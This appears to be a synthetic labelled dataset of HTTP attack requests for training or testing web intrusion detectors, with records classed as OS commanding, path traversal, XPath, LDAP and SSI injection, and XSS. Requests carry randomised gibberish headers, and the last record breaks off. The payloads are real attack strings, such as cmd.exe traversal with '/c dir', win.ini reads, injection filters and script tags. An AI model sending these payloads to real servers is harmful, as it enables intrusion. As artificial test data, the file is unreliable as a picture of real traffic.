~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49415
Start - Id: 44439
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 89.21.214.181
Connection: close
Accept: */*
Accept-Charset: utf-8, x-mac-arabic;q=0.6, windows-874, x-mac-ce
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 169.69.255.164
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Tue, 27 Feb 07 18:28:31 UTC
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Sat, 25 Dec 04 09:37:19 UTC
If-Unmodified-Since: Tue, 27 Nov 07 24:33:56 CET
If-Match: "W0A@U3ZerU._r88sFYn"
If-None-Match: "UHJBzUl.9xwBLFXn"
If-Range: *
Max-Forwards: 89
MIME-Version: 1.5
Pragma: orIohotr=epuLb
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: Digest response="CD60c21d29faf4F13A7CA0f2F88Cf0FA"
Range: 6-02287,72753-
Referer: http://www.sscAO.it/asmnoo2s/t4iSta/RIhsn/iat6aW4/8aqn.dll
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/8.9 (Machintosh; U; Mac OS X 0.0; ne-ve; rv:9.9.9) Gecko/81296682
UA-CPU: Sparc
UA-Disp: 023,120,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 053x237
Via: FTP/0.0 183.56.230.149
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 187.145.72.149
X-Serial-Number: 42253
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 44439
Start - Id: 36229
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: www.YiNt.de
Connection: close
Accept: */*
Accept-Charset: us-ascii, iso-8859-5;q=0.2, koi8
Accept-Encoding: 
Accept-Language: ei6c-EOdi9o, eb-1oeegX2a;q=0.5, rijgPa-eyo, 1kmr-taaTsy
Cache-Control: no-transform
Client-ip: 58.131.95.224
Cookie: x0dZLI1J=dknMuRVCjq
Cookie2: $Version="298"
Date: Fri, 07 Apr 06 12:02:40 UTC
ETag: "HNKW6sLk9FvzbJhDh2r"
Expect: 100-continue
From: 06n1ooo@Nm7tui.gov
If-Modified-Since: Thu, 01 Jan 09 13:07:46 UTC
If-Unmodified-Since: Mon, 15 Jun 09 21:46:55 CET
If-Match: "KF@Qh6Npq.Dbhdld7V"
If-None-Match: *
If-Range: "G8UZdAebuuG3M_5-"
Max-Forwards: 0721
MIME-Version: 9.7
Pragma: sDooBra=gs
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM aGlyc2ltcnVhbWlhd2FSZWNwdXlzZFVuaXNvaWVpZXR0b2JpbmxlZUQ=
Range: 183-
Referer: http://4ftt8sne.uk/aRar/etFpeo.swf
TE: deflate
Trailer: Accept-Language
User-Agent: t14hweheEofb
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Solaris
Via: FTP/6.5 www.cyrat.png
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 779670420209
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36229
Start - Id: 48721
class: XPathInjection
GET /yusucfCaozwOstotbltt/oeeaeta/TMMsGlTr8/6leebd/wTEt5cghgajpkbt/oDBzsKaDmg9qVku7EOt/eUdCHto/po/txrxT/r85Rwm@kDuT-elH/fvjPh_etcm0yLRGrm.jpeg?e2sxu1bro8=toeitn&from_TK7pN=7TSHYoBV6h&h1Tcno6ho=rwmlwiS&xirdpinawnr=ee%27++++or+eh%2Few%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D407%5D++++or+++%27oit%27%3D++%27&ad=860478&Sa@YL6=corr&sock_streamscriptfm4g1TpassthrupZ=292010&m3lkhz0i5a=tmj2e&xa=v%5DPvtniaiauab5Imstdin&tm1rraileIrpod=esx6T&HTi=d3Uea9osock_stream+asrtemmocha&si8safs0b0Urte=ntTof&piifc8tunwM=5Im&ziy6a=h+oe%3Eid0dropaeGr&zrE1noiIphqei=dVJUeQiXWI HTTP/1.0
Host: 195.3.79.120
Connection: srmkOi4h
Accept: image/gif, image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: Cgr-ef
Cache-Control: mtont='b4a5nvhm'
Client-ip: 86.22.3.99
Cookie: oritote425h=9PK;izTtet=nml;copya >;@IJf7-_2ZMFE=ue;divE.N=ia3pnntn2qs;nua=Nve%h =G;sRtned=etle8m
Cookie2: $Version="900"
Date: Sun, 12 Apr 09 01:45:49 UTC
Expect: 100-continue
From: raanojj@nQhsOlcaae.ch
If-Modified-Since: Fri, 06 Aug 04 23:15:33 CET
If-Unmodified-Since: Fri, 24 Feb 06 20:42:13 GMT
If-Match: "3VPG4W1@UZ_oAAAC"
If-None-Match: *
If-Range: Fri, 06 Feb 04 19:27:57 UTC
Max-Forwards: 21
Pragma: a2sw='soaurw'
Proxy-Authorization: Basic d3huRXUyaTp0cWFtYw==
Authorization: Digest response="2d061edCDdeBC6976Ae414Fbd85c3Ef0"
Range: 7-577073
Referer: /ijothti/nddA/keoam/2enodS.doc
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.7 (Windows; U; Win 9x 4.0; 3k-ot; rv:4.4.3) Gecko/26443361
UA-CPU: MIPS
Via: 9.7 47.34.17.177:475, FTP/1.4 www.2elho.shtml
Transfer-Encoding: hr5re
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
Warning: 042 95.15.3.29 "ettnnbeaTz7i" "Fri, 29 Apr 05 11:16:46 UTC"
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48721
Start - Id: 44375
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.sm0ku7tmc.net:618
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity, compress, identity;q=0.8
Accept-Language: w-9G1;q=0.7
Cache-Control: max-stale=84680
Client-ip: 90.164.80.82
Cookie: X2ncYY=r 9elh ;trHxneed8rcdexd=shyduc8;sNevcNoc=226157693;stahhedmenlest=ek;sDaDe=]E
Cookie2: $Version="75"
Date: Sun, 10 Dec 06 01:18:58 CET
ETag: "hRtyES0J8kvkJHkX"
Expect: sHulneie=8tshds;ergxc
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Sat, 15 Sep 07 08:50:35 UTC
If-Unmodified-Since: Sun, 14 Feb 10 15:30:07 GMT
If-Match: "T4zlc4FMAAGr3y8"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: NTLM bGxnZXVtbGl0dE9wTmN4a3RuOHJlaWVlY29oWWU3c3lSYVBqbmVlNGZzMUw5cm9I
Range: -592489
Referer: http://4e5SqU.org/LLwonss/rtw3fi/cetIme.dll
TE: gzip;q=0.9
Trailer: Cache-Control
User-Agent: oaLatKvEfr
UA-CPU: Sparc
UA-Disp: 0327,603,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 347x4806
Via: 5.4 240.50.136.50:26, 5.6 www.4a0wid.css
Transfer-Encoding: gzip
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44375
Start - Id: 40474
class: SSI
GET /V-0ucS/gFU/x4pJ4Fa2HFb/eptl.aspx?systemdlL@B3g@SSE=1015608&sralw8teetoee=fblthiwnvag7d&Srautoexec5d=9onEor%3B3+G%3E%29lnsqt&Era4fLnn=etmssnahytrc&xlwqe34Z=ophwg&tyfnt=%3C%21--%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E HTTP/1.1
Host: 241.125.241.75:80
Connection: close
Accept: application/rtf;q=0.5, text/*;q=0.3, image/*;q=0.9
Accept-Charset: iso-8859-9
Accept-Encoding: *;q=0.7
Accept-Language: ip0snaie-7or;q=0.3, rwgia-1vtomm;q=0.7
Cache-Control: no-transform
Client-ip: 56.163.14.75
Cookie: 7poRla56si=88277634
Cookie2: $Version="386"
Date: Tue, 02 Aug 05 21:57:58 CET
ETag: "9HIuSgRtubV.qwABchz"
Expect: 100-continue
From: Yma7@5eefcOthto.biz
If-Modified-Since: Mon, 23 Jun 08 04:29:14 UTC
If-Unmodified-Since: Mon, 25 Apr 05 21:29:03 CET
If-Match: "YYnZmA1wQSwgbXhJ5L"
If-None-Match: "9FKU8u_.GqW6Spnj"
If-Range: *
Max-Forwards: 5478
MIME-Version: 6.5
Pragma: g5iEicoe='fj'
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: oqe28t tMiztat9=1u0r
Range: 6740-758,0802-
Referer: /norTf/wsnhanb/tmt8kee/tdmxhrgw.cgi
TE: trailers,chunked,trailers
Trailer: User-Agent
User-Agent: n5aA/2.2.8.6.2
UA-CPU: PowerPC
UA-Disp: 0480,927,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 025x185
Via: 7.7 120.165.158.146, 0.3 www.ots2g.js, uhhihe/4.2 www.ngtquefi.css:2
Transfer-Encoding: deflate
Upgrade: saq/8.2, 7weze/1.4, ooi/9.7, onEhrR/5.6, ae02/3.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40474
Start - Id: 47474
class: XSS
GET /H16-xxz5Oa21/saqiMizoidIvu/mtgeeEjyyto/d0/p94listtsstlh8aalmru/sYoeeo/ePW0JA@/6Xzl0t/35IG.I1yG.aspx?nNcaaho=77&cyneueodl=%3Cstyle+++%3E%3C%21--%3C%2Fstyle++%3E%3Cscript++++%3E%5Balert++%28%27ka5ber%27%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E HTTP/1.0
Host: 28.203.41.176:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-japanese;q=0.5, x-mac-greek
Accept-Encoding: *;q=0.2
Accept-Language: rx-zxag, RfXed8l-nn, tw-eleosps, saesdb-eeN, nns-Io
Cache-Control: rs=nha
Client-ip: 38.177.227.246
Cookie: .-wayEeJJN=ue;Pdjithc=inethprtbodyatK ot6eo;zlasjxtrsi=r;vttlw=lpassthruo;3Waccept6PWD0UzL= cei ti;nd3ebhkddDsa=ea=services<t(
Cookie2: $Version="8"
Date: Sat, 19 Mar 05 17:23:16 CET
ETag: W/"lWkzjjgEDYcIKD0"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Thu, 23 Dec 04 24:43:25 UTC
If-Unmodified-Since: Fri, 06 Nov 09 01:41:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 876
MIME-Version: 6.3
Pragma: nanI=uz4e
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 1-845224,09-
Referer: /tuhao/atue/trmwe/0theuHO/9desha3s.asp
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 6.6; it-ue; rv:9.3.6) Gecko/67726006
UA-CPU: Sparc
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 747x653
Via: FTP/8.2 112.13.42.250
Transfer-Encoding: CNRcI; teee=segcn0ot
Upgrade: rshhh0/1.3
Warning: 687 202.196.135.202:06 "idsvpmhabtisfehmuaet" "Sat, 02 Feb 08 06:06:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47474
Start - Id: 37776
class: LdapInjection
GET /gQWU@rk/nOc9e/kPS3Xg/oag_C91ZA.tiff?eseaapqt=2ele&sovnIt=yQU6wg_ZLisx&xtdeews=%29++%28++++%7C+++%28displayName%3Dhad*%29%28name+%3D++had*%29%28++mail%3Dhad*++%29&0Jz_GSdm2Q8k=eeo&LDl8bxtermMMYIx1=AyeS0tAneaafpi4ilU&isntmagCh1ypdh1=mmcx&4yiopieslc=60149&aJ1hons11topdSa=66502705 HTTP/1.1
Host: 255.5.143.80
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rltFkszj-r, sonTlH-rg6eiO, dos-n, 6bchi-u1uos9, hDeAtun3-eohrtmb;q=0.8
Cache-Control: max-age=93
Client-ip: 3.137.158.163
Cookie: eirfor1nwo9=ani6h%iicel;losLMdtgnNnph=t~s;cLWubNVdrop_3=98;dhos1=34486;tsba=86389646
Cookie2: $Version="8"
Date: Sun, 05 Aug 07 10:59:43 GMT
ETag: "K8JclCYhB4_YHqlv"
Expect: vaQg=itklittE
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Tue, 06 Dec 05 23:23:38 GMT
If-Unmodified-Since: Wed, 09 Jan 08 18:26:55 CET
If-Match: *
If-None-Match: *
If-Range: "fNP8tXJP1MPzU6BO"
Max-Forwards: 7188
MIME-Version: 3.2
Pragma: to7Nnon2='2et'
Proxy-Authorization: Basic ZTdhYWNjdDpldWR3aG1lNQ==
Authorization: Digest nc=8BDB0Cd3
Range: -6185,-86
Referer: http://www.gtopgS.st/eooa/thei/ianHueyr/li0bepry.nsf
TE: gzip;q=0.8,gzip;q=0.2,gzip
Trailer: Range
User-Agent: Mozilla/3.2 (X11; U; Open BSD i586 8.3; rd-o9; rv:7.3.1) Gecko/61567381
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 807x162
Via: 5.1 www.eEolaLlt.png, FTP/6.6 www.ocnoR.png
Transfer-Encoding: gzip
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37776
Start - Id: 49980
class: XPathInjection
GET /im@xS/H4f2processing-instruction0dVinclude3L/woverisMtIgeaetcoe/di3se.nsf?gfieotiig0ce=%3E%3CN&najNetpao=7&a3nssoane=ehH&tmr9edl=hmQosufdFJuY&hN4eEeltenoW=5189&joid=-e%25from&vuadznhta=0540860&f3kmnwteeieenc7=l1%27&etnt5utaMa9aa=jp%40&smmtze=iaa%27+++or++sAhaaa%2F8sn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D84%5D+++++or++++%27fEmjtn1%27++%3D++%27&s8=445&CeynnH9r6koqox=oi4Yoer3nrdkn3hoda&9rcutoit=r%28r8stuecr+etcyg+netcatNtg HTTP/1.1
Host: www.adbb5e5s.st
Connection: oee3
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.1
Accept-Language: ah0do-d;q=0.2, Tnno-JnLrh;q=0.1, etaB-so, ot-cayh1Ehr;q=0.9
Cache-Control: min-fresh=38
Client-ip: 156.223.154.24
Cookie2: $Version="372"
Date: Thu, 19 Aug 04 01:58:52 CET
ETag: W/"o_kvEAaAscQ3k6U"
Expect: etuerprO
From: aihryej@wvtazei.be
If-Modified-Since: Fri, 06 Oct 06 02:54:24 CET
If-Unmodified-Since: Mon, 16 May 05 12:22:07 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Mar 07 14:25:03 UTC
Max-Forwards: 82
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: lIa6N tRl9n=obihRto
Authorization: NTLM eUNnaWxmTEFzbm9hRTFlaW5lb25sZ3NobGVseHNoc29rbm9k
Range: 30900-
Referer: /e7gtdnrM.php4
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: oalgygghhrneia
UA-CPU: 68000
UA-Disp: 1888,408,16
UA-OS: Linux
Via: 2.9 www.f1nie5.png, HTTP/3.5 www.sneoreD.htm, 5.8 40.68.208.46:162
Transfer-Encoding: identity
Warning: 265 www.raemriNe.tiff "tniraa8ta" 
X-Forwarded-For: 10.220.189.114
X-Serial-Number: 9512750495246
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49980
Start - Id: 46485
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: www.qneeusxe2.de
Connection: close
Accept: image/jpeg, application/postscript, text/*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.9, deflate, gzip;q=0.7, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 137.78.176.107
Cookie: rWOriaG=531;iwtIo=71225;tsnBAtrr6sE4iF=TliWtaoosaHatei;a9hesp8t=kfe0mdqpErtehggt;FethaEomTer=97;xboaubs1mep=avl-uU92
Cookie2: $Version="45"
Date: Fri, 30 Jun 06 08:42:22 CET
ETag: W/"TvYPSOTjowia_CfKxOZ"
Expect: tphW
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Thu, 03 Jan 08 05:49:02 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 189
Pragma: iyb7u=etotEb
Proxy-Authorization: NTLM MHN0bm50bmJ5dGFuemVvdXI0SFN0TnVzMTdlbzBtNGl3ZWV2dGhjeWlUbndmYg==
Authorization: NTLM aUV3ZnNvaG9zN29laW9mZWh0YXdlTnQwZWl0aWFnMWU=
Range: 875-8,3042-7550,-21263
Referer: http://www.haiRaz.org/ehqe1Uo/ifcsae.php
TE: chunked,trailers
Trailer: If-None-Match
User-Agent: jterycna/1.8.4
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 4.5 www.58sea.tiff, 4i4Cem/7.2 252.29.176.44:875
Transfer-Encoding: compress
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 531 119.150.242.26 "jTg2xs5tderoaEpt" "Tue, 19 Feb 08 13:25:57 UTC"
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46485
Start - Id: 36516
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ilx1rydhde.uk:68
Connection: keep-alive
Accept: image/*
Accept-Charset: euc-tw, windows-1255;q=0.9, windows-1258;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: SO1u5I-acis;q=0.2, he-iaeeqi;q=0.6, dpeaquoo-tc;q=0.7
Cache-Control: no-transform
Client-ip: 138.104.69.2
Cookie: meBo6xeieeseog=wowqmt;esaid73ol1ltc=22100;z8MiP6_=1uI1s23tuI;MmesteaE=94;8UB.V06iE=3\esASa
Cookie2: $Version="7"
Date: Wed, 15 Mar 06 09:50:40 GMT
ETag: "82ovRcbDriA.HwZ_bLf"
Expect: 100-continue
From: penb1st@ydtlidrwxO.uk
If-Modified-Since: Mon, 19 Jun 06 18:58:13 UTC
If-Unmodified-Since: Sat, 23 Jul 05 07:12:40 CET
If-Match: *
If-None-Match: "Byw_kMDmR6jh@NH"
If-Range: *
Max-Forwards: 584
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: iSgy wib3ibfl=t0An8k
Range: 17-
Referer: http://www.wdTsoi2.de/ecprae.pl
TE: deflate;q=0.8,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/9.8 (compatible; MSIE 7.8; Unix; aiteeti; mbtzoHd4t)
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9877x8489
Via: HTTP/2.3 www.hc4s.css:52, 7.8 www.isetla.png
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 015 49.255.222.156 "ltge" "Mon, 28 Nov 05 13:36:16 GMT"
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36516
Start - Id: 38379
class: LdapInjection
GET /dqm/ssi9ctt08narddetE.php4?a1usvdce=6504&rmexy=%29+%28+++%7C%28+cn%3D*o+++%27brien*%29%28mail+%3D*o++++%27brien*++%29&ahoangneu=2&ak=15138428&nBefwaLlexn=imgb0o29ms&ghqtiyzgnb=12145360&0azSie=90&nksBefrest4h=uviB&tCpsfhn=e4oaase5c8aoid HTTP/1.1
Host: www.aFvE0m.com
Connection: lL32ol
Accept: audio/basic, audio/x-wav, video/mpeg
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.7, identity;q=0.1, compress
Accept-Language: irtne-e;q=0.5, eqDe-su;q=0.5, oieoUcee-ttEh;q=0.1
Cache-Control: no-cache
Client-ip: 16.162.112.106
Cookie: trlktnhrus=enraeBr;topNn=ef;E6tu88=?m:1t\
Cookie2: $Version="442"
Date: Fri, 24 Jul 09 20:49:51 UTC
ETag: "_tbcCy0@wz8M8jd"
Expect: 100-continue
From: e3ig@cUsnasr.com
If-Modified-Since: Tue, 18 Sep 07 03:33:15 CET
If-Unmodified-Since: Wed, 30 May 07 24:53:44 UTC
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: "hmxWYR3F.Yd2@Y5J"
If-Range: Thu, 05 May 05 17:23:06 UTC
Max-Forwards: 7438
MIME-Version: 7.6
Pragma: MevR=7
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic c2dsb2VzOmx0c2NCNHM=
Range: 076462-,762888-7,-42981
Referer: /Aau6kabo/nomtr1i/liveel.nsf
TE: gzip;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 4.0; eS-00; rv:7.8.9) Gecko/69400288
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6780x4829
Via: ryo/8.9 160.112.90.2
Transfer-Encoding: deflate
Upgrade: rysE/9.0, mt3/0.2, 84ag/2.9
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 18.81.134.210
X-Serial-Number: 85165873223938
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38379
Start - Id: 38246
class: LdapInjection
GET /q5we1e5ZN/eehuWriginp/i0ilRBbLUsvqI4V5tgH/dyD464gGK8t7e3utG/2gAC5P1/rPXU7k/e5Q4O3ovDtWhiwl/scriptYhlBK@/nutE9ANOC2.css?04uNdnm=86&ve=2l+nt%3Dk&sesn1Ceh=opben%26n1e%3C&yg=uoSe%5DihtloleEaf&aistidppien=%29++++%28%7C++++%28displayName%3Dhad*%29++++%28name%3D++had*%29%28mail%3Dhad*+%29&doc=+nechos0tw&reeealt4lh7ntS=8781&oZn9gUA45zx=Otec8Me6nse&oqYiaDnikrutde=ub&4znoxtermGstyleCdI=376 HTTP/1.1
Host: 36.133.88.246:80
Connection: close
Accept: application/zip;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.5
Cache-Control: ceAdL=tE2
Client-ip: 13.61.176.17
Cookie: twabSkpstetnrc=e&ou
Cookie2: $Version="7"
Date: Sun, 15 Jun 08 05:35:23 GMT
ETag: W/"ZCbAaSPE6CHjWiXUBqL5"
Expect: 100-continue
From: 8shsra@cAmioiern.cz
If-Modified-Since: Sun, 01 Apr 07 07:07:28 GMT
If-Unmodified-Since: Sun, 18 Jan 04 24:57:22 GMT
If-Match: "UeHOdYFJLb0aGH.-iy"
If-None-Match: "kB8jxaJMhk.N4CI"
If-Range: *
Max-Forwards: 630
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: gmfy eWifU=ta57tan
Range: -465,47-4
Referer: http://www.rbiniitt.org/eehlEnA.nsf
TE: trailers,gzip;q=0.0
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.9 (Machintosh; U; PPC Mac OS X 1.7; eb-by; rv:3.0.0) Gecko/72678827
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 980x990
Via: 7.5 231.130.163.48, FTP/3.4 145.200.243.249
Transfer-Encoding: gzip
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 6643372694358822
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38246
Start - Id: 35656
class: XPathInjection
GET /tJrzbT7cYLVHO/8ydin/teNl8e/ddt@Hxxco37kuLqJWEM/nph--GI_Lri/iTccldoG6jTe/n10yebsqtf9iienSt/tienoei/gseOZt6zYMrh/dL.mspx?0l=tN32Bmv&window.open@KZT.4Vdcmd=fag&psameeidep=nQU&ocehNvs2a3=1HSux&a3Tlonseyae=779&ujddvona8Oa=epQ&ishhrninrwg=tih%254he3%27l&sourimomsomi4r=jioQcsAe%27+++++or++m7khh%2Ftbn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D1%5D++or+++++%27ehied%27+++%3D%27&tillCe3s7=rsur&daehOrdduW=doTnmttgyyqaeeeF&ruMhezsdhd6it=n&B-NsFauJA=ynonfsiadmine&nfteesti8r7ife=gttx&AandwH0b61sa=4473 HTTP/1.1
Host: 58.51.135.109
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: min-fresh=40618
Client-ip: 58.89.125.179
Cookie: pqQlS1HfH=8winnt;sa8fatocrtbL=kn]
Cookie2: $Version="449"
Date: Sun, 18 Jan 04 05:32:43 GMT
ETag: "UDJxFP191jf5i2WY"
Expect: 100-continue
From: njsh@NrDrfrcud.com
If-Modified-Since: Tue, 04 Apr 06 10:00:44 UTC
If-Unmodified-Since: Wed, 20 Feb 08 04:32:40 UTC
If-Match: *
If-None-Match: "ELB9rkq_.Cv9cLxCfC1"
If-Range: Thu, 28 Oct 04 20:44:04 GMT
Max-Forwards: 3
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: tvqbts otO9e=Oh7KonRe
Authorization: tpct Qeea=aleyeri8
Range: -93
Referer: http://7rolai.uk/dndenln/duACoYs.cfm
TE: deflate;q=0.6,trailers,deflate;q=0.0
Trailer: User-Agent
User-Agent: oKNc8x@SN http://www.sDnlia.gov
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8105x4373
Via: FTP/4.1 12.96.11.51
Transfer-Encoding: compress
Upgrade: deki/7.7
Warning: 673 36.123.188.80 "hcrIRotv8tetpAwee" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 24734
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35656
Start - Id: 36945
class: LdapInjection
POST /ezexec6UXsystemCwU/o3OpGAgVZ4yAw327q4/dutxrtbye/Oi6/moC/nuseseolhdal.bin? HTTP/1.1
Content-Length: 162
Content-Language: mjcoih
Content-Encoding: deflate
Content-Location: /absE3il/adarhl/iivbn.swf
Content-MD5: c3JyZW5kYXJwYWhlaURlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Apr 05 15:36:49 UTC
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: 116.174.122.3
Connection: close
Accept: audio/*, text/*, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n-eea7, 5kuEuon-prnt;q=0.7
Cache-Control: min-fresh=42873
Client-ip: 211.137.222.198
Cookie: rG=04089;t3bmr3bteIa56oz=m dfd;jnksrEturzxeo9=s Jnebft
Cookie2: $Version="3"
Date: Thu, 19 Jun 08 20:39:10 GMT
ETag: "oFDKZi1jivzLDTUKzFTh"
Expect: 100-continue
From: ohnue@asue.fr
If-Modified-Since: Sun, 01 Jan 06 15:22:10 CET
If-Unmodified-Since: Thu, 18 Mar 10 22:22:38 GMT
If-Match: "U@qwX44gMrekPKD"
If-None-Match: *
If-Range: Tue, 21 Dec 04 16:23:14 UTC
Max-Forwards: 539
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="Srg4"
Range: 060649-
Referer: http://raluitep.biz/sc6nejay/kbnnFsCh/arhb/oribooBs/ae7iA.tiff
TE: trailers,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/6.7 (Windows; U; Win98 2.7; sr-nt; rv:5.7.6) Gecko/67430788
UA-CPU: PowerPC
